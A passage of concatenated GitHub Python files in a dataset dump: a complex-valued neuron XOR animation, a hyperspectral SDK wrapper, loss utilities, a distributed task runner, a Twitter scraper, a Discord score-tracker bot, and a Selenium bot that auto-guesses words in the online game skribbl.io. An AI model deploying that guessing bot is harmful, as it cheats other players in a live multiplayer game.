shrinkA=5, shrinkB=5,\n patchA=None,\n patchB=None,\n connectionstyle=\"angle,angleA=-90,angleB=180,rad=5\",\n )\nraw_angle = plt.annotate('', xy=(0,0))\nlearned_angle = plt.annotate('', xy=(0,0))\n\n# define Input Texts and Input Data\nbbox = dict(boxstyle=\"square\", fc='w', ec='black')\ntxt_handler = [\n plt.text(-2, 0.6, \"Training Data:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, 0.35, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-1.8, 0, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-2, -0.4, \"Target Output:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, -0.65, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace')]\n\nTrain_d = [\n ['Train',[-1, -1], 0],\n ['Train',[-1, 1], 1],\n ['Train',[ 1, -1], 1],\n ['Train',[ 1, 1], 0],\n ['Query',[-1, -1]],\n ['Query',[-1, 1]],\n ['Query',[ 1, -1]],\n ['Query',[ 1, 1]]\n]\ncnt = 0\nt_len = len(Train_d)\ntest = False\nlearned_point, = ax.plot([], [], 'ro')\nraw_point, = ax.plot([], [], 'ro')\ndef updatefig(data):\n global txt_handler, nn, Train_d, cnt, t_len, raw_angle, learned_angle, test, arrowprops, learned_point, raw_point\n bbox = dict(boxstyle=\"square\", fc='w', ec='black')\n bbox_r = dict(boxstyle=\"square\", fc='red', ec='black')\n bbox_g = dict(boxstyle=\"square\", fc='green', ec='black')\n\n if Train_d[cnt][0] == 'Train':\n if test:\n print ('Data: ', Train_d[cnt][1])\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set and show learned angle and point\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n test = False\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n\n return [*txt_handler, learned_angle , raw_angle, learned_point, raw_point]\n else:\n z, q = nn.train(Train_d[cnt][1], 
Train_d[cnt][2])\n xy, xytxt = visualize(np.angle(z), q, -1.2)\n # set raw angle and point\n raw_point.set_data(xy)\n raw_point.set_visible(True)\n raw_angle = plt.annotate('Raw Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gray'), arrowprops=arrowprops)\n \n # set input texts\n txt_handler[0].set_text('Training Data')\n txt_handler[3].set_text('Target Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n # hide learned angle and point\n learned_angle.remove()\n learned_point.set_visible(False)\n test = True\n\n return [*txt_handler, raw_angle, learned_point, raw_point]\n else:\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set learned angle\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n # set input texts\n txt_handler[0].set_text('After Training')\n txt_handler[3].set_text('Learned Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n txt_handler[4].set_bbox(bbox)\n \n # hide raw angle\n raw_angle.set_visible(False)\n raw_point.set_visible(False)\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n \n return [*txt_handler, learned_angle, learned_point, raw_point]\n\nani = animation.FuncAnimation(fig, updatefig, interval=3000, blit=True, repeat=False)\n#ani.save(\"single_neuron.mp4\")\nplt.show()","repo_name":"ey3lock3r/Complex-Valued-NN","sub_path":"complex_neuron_v2.py","file_name":"complex_neuron_v2.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
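The header comment of the script above explains the key idea: the neuron's complex output is mapped to a category by its angle, and with 2 categories x 2 periods the circle is cut into four sectors so that opposite sectors share a category, which is what makes XOR separable for a single neuron. The mapping on its own, as a small sketch consistent with map_z:

    import numpy as np

    def angle_to_category(z, categories=2, periods=2):
        angle = np.angle(z) % (2 * np.pi)
        sector = int(angle // (2 * np.pi / (categories * periods)))
        return sector % categories

    print(angle_to_category(np.exp(1j * np.pi / 4)))       # 0
    print(angle_to_category(np.exp(1j * 3 * np.pi / 4)))   # 1
    print(angle_to_category(np.exp(1j * 5 * np.pi / 4)))   # 0 -- opposite sector, same category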
+{"seq_id":"37079550432","text":"import logging\nimport os\nimport platform\n\nfrom cuvis_il import cuvis_il\nfrom .cuvis_aux import SDKException\nfrom .cuvis_types import ComponentType\n\nimport cuvis.cuvis_types as internal\n\nfrom dataclasses import dataclass\n\nclass General(object):\n def __init__(self, path=\"\"):\n log_path = \".\"\n FORMAT = '%(asctime)s -- %(levelname)s: %(message)s'\n if os.path.exists(path):\n log_path = path + os.sep\n elif platform.system() == \"Linux\":\n log_path = os.path.expanduser('~') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n elif platform.system() == \"Windows\":\n log_path = os.getenv('APPDATA') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n \n if os.path.exists(log_path):\n logging.basicConfig(filename=log_path + \"cuvisSDK_python.log\",\n format=FORMAT,\n encoding='utf-8',\n level=logging.DEBUG,\n filemode='w')\n else:\n raise SDKException(\n \"path {} does not exist...\".format(os.path.abspath(log_path)))\n logging.info(\"Logger ready.\")\n\n if cuvis_il.status_ok != cuvis_il.cuvis_init(log_path):\n raise SDKException()\n pass\n\n @property\n def version(self) -> str:\n return cuvis_il.cuvis_version_swig()\n\n def set_log_level(self, lvl):\n lvl_dict = {\"info\": {\"cuvis\": cuvis_il.loglevel_info,\n \"logging\": logging.INFO},\n \"debug\": {\"cuvis\": cuvis_il.loglevel_debug,\n \"logging\": logging.DEBUG},\n \"error\": {\"cuvis\": cuvis_il.loglevel_error,\n \"logging\": logging.ERROR},\n \"fatal\": {\"cuvis\": cuvis_il.loglevel_fatal,\n \"logging\": logging.CRITICAL},\n \"warning\": {\"cuvis\": cuvis_il.loglevel_warning,\n \"logging\": logging.WARNING},\n }\n\n cuvis_il.cuvis_set_log_level(lvl_dict[lvl][\"cuvis\"])\n logging.basicConfig(level=lvl_dict[lvl][\"logging\"])\n\n\n@dataclass\nclass ComponentInfo(object):\n type: ComponentType = None\n display_name: str = None\n sensor_info: str = None\n user_field: str = None\n pixel_format: str = None\n\n def _get_internal(self):\n ci = cuvis_il.cuvis_component_info_t()\n ci.type = internal.__CuvisComponentType__[self.type]\n ci.displayname = self.display_name\n ci.sensorinfo = self.sensor_info\n ci.userfield = self.user_field\n ci.pixelformat = self.pixel_format\n return ci\n \n @classmethod\n def _from_internal(cls, ci):\n return cls(type=internal.__ComponentType__[ci.type],\n display_name=ci.displayname,\n sensor_info=ci.sensorinfo,\n user_field=ci.userfield,\n pixel_format=ci.pixelformat)\n","repo_name":"cubert-hyperspectral/cuvis.python","sub_path":"cuvis/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39268298588","text":"import logging as log\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\ndef get_irreducable_losses_complete(dataloader, small_model):\n log.info('Calculating irreducible losses')\n irr_losses = []\n with torch.inference_mode():\n for idx, (data, target) in enumerate(dataloader):\n irr_losses.append(compute_irreducable_loss_batch(data, target, small_model))\n return irr_losses\n\n\ndef compute_irreducable_loss_batch(data, target, small_model):\n output = small_model(data)\n if str(type(output)) == \"\":\n output = output.logits\n return F.cross_entropy(\n output, target, reduction=\"none\"\n )\n\n\ndef compute_reducable_loss_batch(large_model: nn.Module, small_model: nn.Module, data, target):\n with torch.inference_mode():\n logits = large_model(data)\n if str(type(logits)) == \"\":\n logits = logits.logits\n model_loss = F.cross_entropy(logits, target, reduction=\"none\")\n irreducible_loss = compute_irreducable_loss_batch(data, target, small_model)\n reducible_loss = model_loss - irreducible_loss\n\n return model_loss, reducible_loss\n","repo_name":"TNJKvm/stood-over-june","sub_path":"src/utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34594477388","text":"\"\"\"\ntasq.remote.runner.py\n~~~~~~~~~~~~~~~~~~~~~\nRunner process, listening for incoming connections to schedule tasks to a pool\nof worker actors\n\"\"\"\nimport os\nimport asyncio\nfrom multiprocessing import Process, cpu_count\n\nimport tasq.worker as worker\nimport tasq.actors as actors\nfrom .backend import ZMQBackend\nfrom .connection import connect_redis_backend, connect_rabbitmq_backend\nfrom ..logger import get_logger\n\n\ndef max_workers():\n return (cpu_count() * 2) + 1\n\n\nclass Runner:\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._run = False\n self._unpickle = unpickle\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n\n def _respond(self, fut):\n self._backend.send_result(fut.result())\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n # Stop server connection\n self._run = False\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._run = True\n self._log.debug(\"Listening on %s\", self._backend)\n self.run()\n\n def run(self):\n while self._run:\n job = self._backend.recv(5, unpickle=self._unpickle)\n if not job:\n continue\n self._log.debug(\"Received job: %s\", job)\n fut = self._workers.route(job)\n fut.add_done_callback(self._respond)\n\n\nclass ZMQRunner:\n \"\"\"Runner process, handle requests asynchronously from clients and\n delegate processing of incoming tasks to worker processes, responses are\n sent back to clients by using a dedicated thread\n \"\"\"\n\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._unpickle = unpickle\n self._run = False\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n self._loop = asyncio.get_event_loop()\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n self._run = False\n # Cancel pending tasks (opt)\n for task in asyncio.Task.all_tasks():\n task.cancel()\n self._loop.stop()\n self._loop.close()\n # Stop server connection\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._backend.bind()\n self._run = True\n self._log.info(self._backend)\n self._loop.create_task(self.run())\n self._loop.run_forever()\n\n async def run(self):\n while self._run:\n try:\n if await self._backend.poll():\n job = await self._backend.recv(unpickle=self._unpickle)\n self._log.debug(\"Received job: %s\", job)\n f = self._workers.route(job)\n fut = asyncio.wrap_future(f)\n await self._backend.send(await fut)\n except asyncio.CancelledError:\n pass\n\n\nclass Runners:\n\n \"\"\"Class to handle a pool of runners on the same node\"\"\"\n\n def __init__(self, binds, signkey=None, unix_socket=False):\n # List of tuples (host, pport, pull_port) to bind to\n self._binds = binds\n # Digital sign data before send an receive it\n self._signkey = signkey\n # Unix socket flag, if set to true, unix sockets for interprocess\n # communication will be used and ports will be used to differentiate\n # push and pull channel\n 
self._unix_socket = unix_socket\n # Processes, equals the len of `binds`\n self._procs = []\n self._init_binds()\n\n def _serve_runner(self, host, psh_port, pl_port):\n pass\n # m = ZMQActorRunner(\n # host,\n # psh_port,\n # pl_port,\n # signkey=self._signkey,\n # unix_socket=self._unix_socket,\n # )\n # m.start()\n\n def _init_binds(self):\n self._procs = [\n Process(target=self._serve_runner, args=(host, psh_port, pl_port,))\n for host, psh_port, pl_port in self._binds\n ]\n\n def start_procs(self):\n for proc in self._procs:\n proc.start()\n try:\n for proc in self._procs:\n proc.join()\n except KeyboardInterrupt:\n # Clean up should be placed\n pass\n\n\nclass RunnerFactory:\n def __init__(self):\n self._builders = {}\n\n def register_builder(self, key, builder):\n self._builders[key] = builder\n\n def create(self, key, **kwargs):\n builder = self._builders.get(key)\n if not builder:\n raise ValueError(key)\n return builder(**kwargs)\n\n\ndef build_zmq_actor_runner(\n host,\n channel,\n router_class=actors.RoundRobinRouter,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=True,\n):\n push, pull = channel\n ctx = actors.get_actorsystem(f\"{host}:({push}, {pull})\")\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n unpickle,\n signkey,\n )\n\n\ndef build_zmq_queue_runner(\n host,\n channel,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=False,\n):\n push, pull = channel\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server, lambda: worker.build_jobqueue(num_workers), unpickle, signkey\n )\n\n\ndef build_redis_actor_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_redis_queue_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\ndef build_rabbitmq_actor_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_rabbitmq_queue_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\nrunner_factory = RunnerFactory()\nrunner_factory.register_builder(\"ZMQ_ACTOR_RUNNER\", build_zmq_actor_runner)\nrunner_factory.register_builder(\"ZMQ_QUEUE_RUNNER\", build_zmq_queue_runner)\nrunner_factory.register_builder(\"REDIS_QUEUE_RUNNER\", 
build_redis_queue_runner)\nrunner_factory.register_builder(\"REDIS_ACTOR_RUNNER\", build_redis_actor_runner)\nrunner_factory.register_builder(\n \"AMQP_QUEUE_RUNNER\", build_rabbitmq_queue_runner\n)\nrunner_factory.register_builder(\n \"AMQP_ACTOR_RUNNER\", build_rabbitmq_actor_runner\n)\n","repo_name":"codepr/tasq","sub_path":"tasq/remote/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"53"}
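runner_factory above is a plain registry/builder pattern: the caller picks a backend by key and passes only that builder's keyword arguments. A usage sketch based on the build_zmq_queue_runner signature (host and ports are placeholders):

    runner = runner_factory.create(
        "ZMQ_QUEUE_RUNNER",
        host="127.0.0.1",
        channel=(9000, 9001),   # (push, pull) ports
        num_workers=4,
    )
    runner.start()   # blocks in the asyncio loop; call runner.stop() to shut down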
+{"seq_id":"7073235269","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib.parse\nimport datetime as dt\n\"\"\"\nneeds.py는 키워드를 선택, url검색, 키워드 검색 시 날짜구분에 이용됨\n\"\"\"\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"DBP.settings\")\nimport django\ndjango.setup()\nfrom App.models import Data\n\nclass TwitterCrawling():\n keyword = \"\"\n\n def __init__(self):\n self.url1 = \"https://twitter.com/search?f=tweets&vertical=default&q=\"\n #self.url2 = urllib.parse.quote_plus(\", \".join(self.keyword))\n self.s_date = dt.date(year=2018, month=11, day=30)\n self.e_date = dt.date(year=2018, month=12, day=1)\n\n def InputKeyword(self, word):\n print(\"트위터에서 검색될 키워드 : \")\n self.keyword = word\n print(\"\\\"\" + self.keyword + \"\\\"\")\n return self.connect_chrome()\n\n def connect_chrome(self):\n print(\"Connecting chrome to tweet !\")\n self.url = str(self.url1 + self.keyword)\n\n # 드라이버 연결(Chrome)\n self.driver = webdriver.Chrome('C:/Users/User/Desktop/chromedriver.exe')\n # 암묵적으로 웹 자원 로드를 위해 2초까지 기다린다\n self.driver.implicitly_wait(2)\n\n # BeautifulSoup를 이용한 html 스크래핑\n self.driver.get(self.url + '%20since%3A' + str(self.s_date) + '%20until%3A' + str(self.e_date) + '&amp;amp;amp;amp;lang=ko')\n self.html = self.driver.page_source\n self.soup = BeautifulSoup(self.html, 'html.parser')\n\n return self.parse_twitter_text()\n\n def parse_twitter_text(self):\n print(\"Parsing tweet text !(max = 20)\")\n # 내용 파싱(추출)\n lists = self.soup.find_all(\"p\", {\"class\": \"TweetTextSize\"})\n data_title = {}\n\n # 보여짐\n for i in lists:\n data_title[i.text] = i.text\n self.driver.quit()\n return data_title\n","repo_name":"JinMinChoi/DB_Project","sub_path":"DBP/first_tweet_new.py","file_name":"first_tweet_new.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19435041462","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport os\nimport time\nimport sys\nfrom threading import Thread\n\ndef try_word(word, known):\n try:\n if len(word) != len(known):\n raise ValueError(\"Word and known aren't the same length!\")\n x = 0\n for char in known:\n if word[x] == char or char == \"*\":\n if x == len(word) - 1:\n elem = driver.find_element_by_id(\"inputChat\")\n elem.clear()\n elem.send_keys(word) \n elem.send_keys(Keys.ENTER)\n time.sleep(1)\n else: \n x += 1\n continue\n else:\n break\n except Exception as e:\n print(e)\n\ndef get_words():\n method = input(\"1: Read words from file | 2: Enter words comma seperated | 3: Use words.txt >\")\n if method == \"1\":\n with open(input(\"Filename >\"), \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n elif method == \"2\":\t\n words = input(\"Enter the words seperatet by \\\",\\\" (no space):\")\n words = words.split(\",\")\n return words\n elif method == \"3\":\n with open(\"words.txt\", \"r\") as file:\n\t words = file.readlines()\n final_words = []\n for word in words:\n word = word.replace(\"\\n\", \"\")\n final_words.append(word)\n return final_words\n else: \n print(\"Invalid input!\")\n return get_words()\n\ndef sort_words(words):\n longest = 0\n for word in words:\n if len(word) > longest:\n longest = len(word)\n all_words = {}\n for leng in range(longest):\n current_words = []\n for word in words:\n if len(word) == leng:\n current_words.append(word)\n all_words[leng] = current_words\n return all_words\n\ndef get_current_word():\n elem = driver.find_element_by_id(\"currentWord\")\n return elem.text\n\ndef get_player():\n players = driver.find_elements_by_class_name(\"player\")\n for player in players:\n info = player.find_elements_by_class_name(\"info\")\n nameElem = info[0].find_elements_by_class_name(\"name\")\n name = nameElem[0].text\n if \"(You)\" in name:\n return player\n\ndef clear_screen():\n # for windows\n if os.name == 'nt':\n _ = os.system('cls')\n # for mac and linux(here, os.name is 'posix')\n else:\n _ = os.system('clear')\n\ndef handleInput():\n global cmd\n global should_print\n global auto\n global clear\n\n while True:\n time.sleep(1)\n inp = input(\"\")\n if inp == \"len\":\n should_print = False\n leng = input(\"Enter the new length >\")\n should_print = True\n cmd = \"len \" + leng\n elif inp == \"quit\":\n cmd = \"quit\"\n sys.exit()\n elif inp == \"known\":\n should_print = False\n known = input(\"Enter what you know >\")\n should_print = True\n cmd = \"known \" + known\n elif inp == \"done\":\n cmd = \"done\"\n elif inp == \"auto\":\n auto = not auto\n elif inp == \"clear\":\n clear = not clear\n else:\n should_print = False\n if auto:\n print(\"Unknown command\\nUse one of these: len quit known done auto clear\")\n else:\n print(\"Unknown command\\nUse one of these: quit auto clear\")\n time.sleep(1)\n should_print = True\n\ndef run():\n global cmd\n global should_print\n global auto\n global done\n global clear\n player = None\n known = \"\"\n leng = 0\n\n while True:\n if leng == 0 and not auto:\n leng = input(\"Enter the length >\")\n known = \"*\" * int(leng)\n elif leng == 0:\n known = get_current_word().replace(\"_\", \"*\")\n leng = len(known)\n\n if player == None:\n player = get_player()\n\n current = 0\n list_len = len(words[int(leng)])\n\n for word in words[int(leng)]:\n current += 1\n\n if 
auto:\n if player.get_attribute(\"class\") == \"player guessedWord\" and not done:\n cmd = \"done\"\n temp = known\n known = get_current_word().replace(\"_\", \"*\")\n temp2 = leng\n leng = len(known)\n if len(known.replace(\"*\", \"\")) < len(temp.replace(\"*\", \"\")) or temp2 != leng:\n print(\"New word detected, restarting with length \" + str(leng))\n done = False\n break\n\n if cmd != \"\":\n if \"len \" in cmd:\n leng = int(cmd.replace(\"len \", \"\"))\n known = \"*\" * int(leng)\n print(\"Length set successfully\")\n cmd = \"\"\n break\n\n elif cmd == \"quit\":\n sys.exit()\n\n elif \"known\" in cmd:\n known = cmd.replace(\"known \", \"\")\n print(\"Set known to: \" + known)\n cmd = \"\"\n\n elif cmd == \"done\":\n if not auto:\n leng = 0\n else:\n done = True\n print(\"Word found: '\" + lastWord + \"', waiting for it to change...\")\n cmd = \"\"\n break\n\n if should_print and not done:\n if clear:\n clear_screen()\n percent = int(current * 100 / list_len)\n percent_string = \"[ \" + \" \" * (3 - len(str(percent))) + \"\" + str(percent) + \"% ]\"\n progress_bar_string = \"[\" + \"#\" * int(percent / 10) + \" \" * int(10 - int(percent / 10)) + \"]\"\n count_string = \"[ \" + \" \" * (len(str(list_len)) - len(str(current))) + \"\" + str(current) + \" / \" + str(list_len) + \" ]: \" \n print(percent_string + progress_bar_string + count_string + word)\n\n if not done:\n lastWord = word\n try_word(word, known)\n\n if not auto:\n leng = 0\n\ncmd = \"\"\nshould_print = True\nauto = input(\"Start with auto mode? True | False >\")\ndone = False\nclear = False\nwhile (not auto == \"True\") and (not auto == \"False\"):\n auto = input(\"Invalid input. True | False >\")\nwords = sort_words(get_words())\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\noptions.add_argument(\"--disable-extensions\")\ndriver = webdriver.Chrome(\".\\chromedriver.exe\", options=options)\ndriver.get(\"https://skribbl.io\")\n\ninput_thread = Thread(target=handleInput)\nrun_thread = Thread(target=run)\n\ninput_thread.start()\nrun_thread.start()","repo_name":"GaviTSRA/TSR-Website-Preview","sub_path":"software/skribblbot.py","file_name":"skribblbot.py","file_ext":"py","file_size_in_byte":6964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38845449417","text":"import os\r\n\r\nimport pandas as pd\r\n\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n\r\nDEFAULT_PATH = \"score_tracker.dat\"\r\nMIN_SCORE = -10\r\nMAX_SCORE = 10\r\n\r\n\r\nclass ScoreTracker(commands.Cog):\r\n \"\"\"\r\n Track T4g1 scores on jokes, provide its current average score as well as\r\n useful statistics\r\n \"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.tracker_user = None\r\n self.history = pd.DataFrame()\r\n self.fix_time = timedelta(\r\n minutes=int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n )\r\n\r\n self.load()\r\n\r\n def test(self):\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_USER\") is None\r\n ), \"SCORE_TRACKER_USER is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_TARGET\") is None\r\n ), \"SCORE_TRACKER_TARGET is not defined\"\r\n assert (\r\n not os.getenv(\"SCORE_TRACKER_FIX_TIME\") is None\r\n ), \"SCORE_TRACKER_FIX_TIME is not defined\"\r\n\r\n try:\r\n _ = int(os.getenv(\"SCORE_TRACKER_FIX_TIME\"))\r\n except Exception:\r\n self.fail(\"SCORE_TRACKER_FIX_TIME is not a proper integer\")\r\n\r\n def add_score(self, score):\r\n \"\"\"Adds the given score into the data\r\n Expect a sanitized score\r\n \"\"\"\r\n index = len(self.history)\r\n data = self.history.to_dict()\r\n data[\"date\"][index] = datetime.utcnow()\r\n data[\"score\"][index] = score\r\n\r\n print(\"T4g1 got a new score: {}\".format(score))\r\n\r\n self.history = pd.DataFrame.from_dict(data)\r\n\r\n self.persist()\r\n\r\n def remove_last(self):\r\n self.history = self.history[-1]\r\n\r\n self.persist()\r\n\r\n print(\"Score tracker entry removed\")\r\n\r\n def load(self):\r\n \"\"\"Load persisted data from disk\"\"\"\r\n try:\r\n self.history = pd.read_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH),\r\n parse_dates=[\"date\"],\r\n )\r\n except FileNotFoundError:\r\n pass\r\n\r\n if len(self.history) == 0:\r\n self.history = pd.DataFrame.from_dict({\"date\": [], \"score\": []})\r\n\r\n self.history.set_index(\"date\")\r\n\r\n print(\"Loaded {} tracking data\".format(len(self.history)))\r\n\r\n def persist(self):\r\n \"\"\"Persist data on disk\"\"\"\r\n self.history.to_csv(\r\n os.getenv(\"SCORE_TRACKER_PATH\", default=DEFAULT_PATH), index=False\r\n )\r\n\r\n def is_in_range(self, value):\r\n \"\"\"Tells if the value is in range\"\"\"\r\n return value >= MIN_SCORE and value <= MAX_SCORE\r\n\r\n async def is_tracker_user(ctx):\r\n return ctx.author == ctx.cog.tracker_user\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n tracker_user_name = os.getenv(\"SCORE_TRACKER_USER\", default=\"\")\r\n self.tracker_user = self.bot.get_guild().get_member_named(\r\n tracker_user_name\r\n )\r\n\r\n tracker_target_name = os.getenv(\"SCORE_TRACKER_TARGET\", default=\"\")\r\n self.tracker_target = self.bot.get_guild().get_member_named(\r\n tracker_target_name\r\n )\r\n\r\n assert (\r\n self.tracker_user\r\n ), \"The privilegied user was not found, check configuration\"\r\n\r\n @commands.command(name=\"savg\")\r\n async def average(self, ctx):\r\n \"\"\"Displays score tracker average score\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\r\n \"No score given yet, can't average the void yet\"\r\n )\r\n\r\n avg = self.history[\"score\"].sum() / len(self.history)\r\n\r\n await ctx.send(\"Average score: {:.2f}\".format(avg))\r\n\r\n print(\"Giving score tracking average\")\r\n\r\n @commands.command(name=\"sstats\")\r\n async def stats(self, ctx):\r\n 
\"\"\"Displays score tracker stats\"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"No score given yet, can't stat the void yet\")\r\n\r\n df = self.history\r\n\r\n first_of_month = datetime.utcnow().date().replace(day=1)\r\n first_of_month = datetime.combine(first_of_month, datetime.min.time())\r\n\r\n first_of_year = datetime.utcnow().date().replace(month=1, day=1)\r\n first_of_year = datetime.combine(first_of_year, datetime.min.time())\r\n\r\n this_week = df[\"date\"] >= datetime.utcnow() - timedelta(weeks=1)\r\n this_month = df[\"date\"] >= first_of_month\r\n this_year = df[\"date\"] >= first_of_year\r\n\r\n avg_week = df[this_week][\"score\"].sum() / len(df[this_week])\r\n avg_month = df[this_month][\"score\"].sum() / len(df[this_month])\r\n avg_year = df[this_year][\"score\"].sum() / len(df[this_year])\r\n\r\n await ctx.send(\r\n \"Average this week: {:.2f} month: {:.2f} year: {:.2f}\\n\"\r\n \"This week: max: {}, min: {}\\n\"\r\n \"This month: max: {}, min: {}\\n\"\r\n \"All time: max: {}, min: {}\".format(\r\n avg_week,\r\n avg_month,\r\n avg_year,\r\n df[this_week][\"score\"].max(),\r\n df[this_week][\"score\"].min(),\r\n df[this_month][\"score\"].max(),\r\n df[this_month][\"score\"].min(),\r\n df[\"score\"].max(),\r\n df[\"score\"].min(),\r\n )\r\n )\r\n\r\n print(\"Giving score tracking stats\")\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def score(self, ctx, score: int):\r\n \"\"\"[score]/-[score]: Add/remove score\"\"\"\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n self.add_score(score)\r\n\r\n if score > 0:\r\n await ctx.send(\"GG {}!\".format(self.tracker_target.mention))\r\n elif score == 0:\r\n await ctx.send(\"Coucou {}!\".format(self.tracker_target.mention))\r\n else:\r\n await ctx.send(\"It's bad {}!\".format(self.tracker_target.mention))\r\n\r\n await self.bot.publish(ctx, \"score_tracker.scored\", score)\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def fix(self, ctx, score: int):\r\n \"\"\"[score]: Used to fix the latest score entered\r\n Available during SCORE_TRACKER_CORRECTION_TIME minutes\r\n \"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"I have no score to fix!\")\r\n\r\n if 